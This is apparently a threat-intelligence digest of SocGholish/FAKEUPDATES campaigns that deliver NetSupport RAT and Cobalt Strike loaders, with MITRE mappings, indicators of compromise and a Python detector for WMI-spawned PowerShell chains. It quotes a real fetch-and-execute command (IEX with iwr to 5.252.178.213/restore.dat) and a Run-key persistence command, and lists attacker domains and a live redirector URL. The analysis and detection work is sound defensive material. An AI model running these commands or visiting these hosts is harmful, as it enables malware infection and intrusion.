The article analyzes SocGholish (aka FAKEUPDATES) campaigns and how they function as a major initial-access vector through fake updates, compromised sites, and phishing-style techniques, detailing loader chains and observed IOCs. It covers campaigns delivering NetSupport RAT and Cobalt Strike loaders, including XLL/.NET-based obfuscation, pivot points, and a wide set of indicators linking infrastructure and payloads. #SocGholish #FAKEUPDATES #NetSupportRAT #CobaltStrike #BlisterLoader #EvilCorp
Keypoints
- SocGholish (FAKEUPDATES) has evolved into a prominent corporate initial-access framework and is linked to Evil Corp through partnerships and operational ties.
- Campaigns regularly employ fake software updates via drive-by downloads and links in email spam, with specific campaigns such as fake captcha sites and compromised websites.
- Loader chains include .NET-based loaders with obfuscated strings and LNK/VHD delivery leading to NetSupport RAT or Cobalt Strike (“Blister”) loader variants.
- Many campaigns leverage cross-platform infrastructure (HTTPS traffic, multiple gateways) and extensive environment profiling before deployment, including registry-based persistence and WMI-based discovery.
- Persistence and evasion techniques include using Run keys for autorun, PowerShell-based payloads, and XOR/obfuscation wrappers (ServHelper-like patterns) to load additional components.
- Attack infrastructure features a mix of domains, IPs, and compromised sites that serve as redirectors and C2 endpoints, with observed IOCs spanning numerous domains, hashes, and file names.
MITRE Techniques
- [T1189] Drive-by Compromise – Fake-update lures are served from compromised websites carrying injected JavaScript. ‘Drive-by download campaigns normally consist of a website with injected javascript code.’
- [T1566.001] Spearphishing Link – Use of links in email spam to deliver malicious content. ‘through links in email spam.’
- [T1059.001] PowerShell – The loader chain includes explicit PowerShell invocation to fetch and execute payloads. ‘process call create "cmd /c start /min C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c IEX (iwr -usebasicparsing 'http://5.252.178.213/restore.dat')"!%SystemRoot%\System32\SHELL32.dll’
- [T1027.001] Obfuscated/Compressed Data and Information – .NET loaders obfuscate important strings to hinder analysis. ‘These .NET based loaders contain a simplistic way that they obfuscate all their important strings’
- [T1047] WMI – Use of WMI queries to enumerate system information. ‘Some WMI queries:’
- [T1547.001] Boot or Logon Autostart Execution – Registry Run Keys/Startup Folder persistence. ‘The registry key Run’ and ‘Sets a run key and starts the process.’
- [T1071.001] Web Protocols – HTTPS-based C2 communications. ‘along with communicating over HTTPS, this sample talked to irsbusinessaudit[.]net which was leveraged as part of the aforementioned captcha campaigns leading to NetSupport RAT.’
- [T1082] System Information Discovery – Extensive environment profiling before deployment. ‘The script will end up gathering a lot of information which is sent off:’
- [T1041] Exfiltration Over C2 Channel – Data gathered from the infected system is exfiltrated to C2 endpoints as part of profiling and delivery. ‘This is sent off’ (context within init/profiling steps).
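A defender-side check for the WMI-to-PowerShell download-cradle chain and the Run-key persistence listed in the techniques above, added here as an example (not code from the article): it walks constructed Sysmon-style process-creation records, so the event fields, PIDs, parent/child layout and file names are assumptions.

```python
import re

# Constructed Sysmon-style process-creation events (sample data, not from the article).
# The first chain mirrors the quoted "process call create" command; the last event is benign.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 812, "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic process call create \"cmd /c start /min powershell.exe "
                "-c IEX (iwr -usebasicparsing 'http://5.252.178.213/restore.dat')\""},
    {"pid": 4132, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c start /min powershell.exe -c IEX (iwr -usebasicparsing "
                "'http://5.252.178.213/restore.dat')"},
    {"pid": 4140, "ppid": 4132, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -c IEX (iwr -usebasicparsing 'http://5.252.178.213/restore.dat')"},
    {"pid": 4150, "ppid": 4140, "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d %APPDATA%\upd.exe"},
    {"pid": 5000, "ppid": 612, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

CRADLE_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
FETCH_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadstring|downloadfile)\b", re.I)
RUN_KEY_RE = re.compile(r"currentversion\\run\b", re.I)

def ancestors(event, by_pid):
    """Walk ppid links upward; return ancestor image names, lowercased."""
    chain, seen = [], set()
    parent = by_pid.get(event["ppid"])
    while parent and parent["pid"] not in seen:
        seen.add(parent["pid"])
        chain.append(parent["image"].rsplit("\\", 1)[-1].lower())
        parent = by_pid.get(parent["ppid"])
    return chain

def detect(events):
    """Return (pid, technique, reason) tuples for events matching the chain."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = e["image"].rsplit("\\", 1)[-1].lower()
        cmd = e["cmdline"]
        if name == "wmic.exe" and "process call create" in cmd.lower():
            findings.append((e["pid"], "T1047", "WMI process creation"))
        if name == "powershell.exe" and CRADLE_RE.search(cmd) and FETCH_RE.search(cmd):
            via = " via wmic" if "wmic.exe" in ancestors(e, by_pid) else ""
            findings.append((e["pid"], "T1059.001", "download cradle" + via))
        if name == "reg.exe" and RUN_KEY_RE.search(cmd) and "powershell.exe" in ancestors(e, by_pid):
            findings.append((e["pid"], "T1547.001", "Run key set by PowerShell descendant"))
    return findings
```

The parent-chain lookup is what separates the quoted WMI-spawned cradle from an ordinary scripted PowerShell run; the benign backup event produces no finding.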
Indicators of Compromise
- [Domain] irsbusinessaudit.net – Used in captcha campaigns and as a C2/redirector domain. Example: irsbusinessaudit[.]net/captcha.php
- [Domain] design.lawrencetravelco.com – Redirector site used in drive-by chains. Example: https://design.lawrencetravelco.com/report?r=dj1iNjI0OWFiNTViODVhMDIxZmRjZCZjaWQ9MjYy
- [IP Address] 5.252.178.213 – Used in XLL loader campaigns and LNK file distributions. Example: 5.252.178[.]213/restore.dat
- [IP Address] 149.28.68.114 – Listed as a download source in the chain (restore.dat downloader). Example file name: form_irs_check.png
- [File Hash] 9d8d289dd7fe149e89152983e40b2c1031e0dba3de9d89513163068bfb27a314
- [File Hash] ccc0204486cbf8b6db43711ddf8d847cfc15d5f713c60b53c461c4e4eeeb1a4f
- [File Name] Chrome.Update.50e772.js – Part of the fakeupdate campaign package.
- [File Name] stage_2.js – Initial loader stage in the SocGholish chain.
- [URL] https://irsbusinessaudit[.]net/captcha.php – Redirector/captcha site used in campaigns.
- [URL] https://design.lawrencetravelco.com/report?r=dj1iNjI0OWFiNTViODVhMDIxZmRjZCZjaWQ9MjYy – Example of a redirector URL used in the campaign.
- [ZIP] DOo0gd4h.zip – ZIP package containing loaders and scripts.
- [File Hash] 56de90d87bb9afc5345991b910a17cf0c6ee95cb97ea4b6de87fd93a8f22c9c0 – Chrome.Update.50e772.js payload hash (example).
Read more: https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee